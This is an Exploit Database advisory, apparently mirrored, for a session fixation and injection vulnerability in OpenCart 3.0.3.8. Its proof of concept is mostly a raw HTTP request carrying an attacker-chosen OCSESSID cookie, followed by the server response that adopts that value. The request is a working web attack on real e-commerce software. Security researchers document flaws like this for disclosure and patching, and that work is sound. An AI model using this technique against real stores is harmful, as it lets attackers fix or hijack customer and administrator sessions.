opencart 3.0.3.8 – Sessjion Injection

• Exploit Database
• 24 阅读

• 作者： Hubert Wojciechowski
  日期： 2021-11-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50555/

• # Exploit Title: opencart 3.0.3.8 - Sessjion Injection
  # Date: 28/11/2021
  # Exploit Author: Hubert Wojciechowski
  # Contact Author: snup.php@gmail.com
  # Company: https://redteam.pl
  # Vendor Homepage: https://www.opencart.com/
  # Software Link: https://www.opencart.com/
  # Version: 3.0.3.8
  # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  
  ### Sessjion Fixation / injection
  
  Session cookie "OCSESSID" is inproperly processed
  Attacker can set any value cookie and server set this value 
  Becouse of that sesssion injection and session fixation vulnerability
  
  -----------------------------------------------------------------------------------------------------------------------
  # POC
  -----------------------------------------------------------------------------------------------------------------------
  
  ## Example
  
  Modify cookie "OCSESSID" value:
  -----------------------------------------------------------------------------------------------------------------------
  Req
  -----------------------------------------------------------------------------------------------------------------------
  
  GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: close
  Referer: http://127.0.0.1/opencart-3.0.3.8/
  Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  
  -----------------------------------------------------------------------------------------------------------------------
  Server set atttacker value:
  
  Res:
  -----------------------------------------------------------------------------------------------------------------------
  
  HTTP/1.1 200 OK
  Date: Sun, 28 Nov 2021 15:16:06 GMT
  Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
  X-Powered-By: PHP/8.0.11
  Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/
  Connection: close
  Content-Type: text/html; charset=utf-8
  Content-Length: 18944
  [...]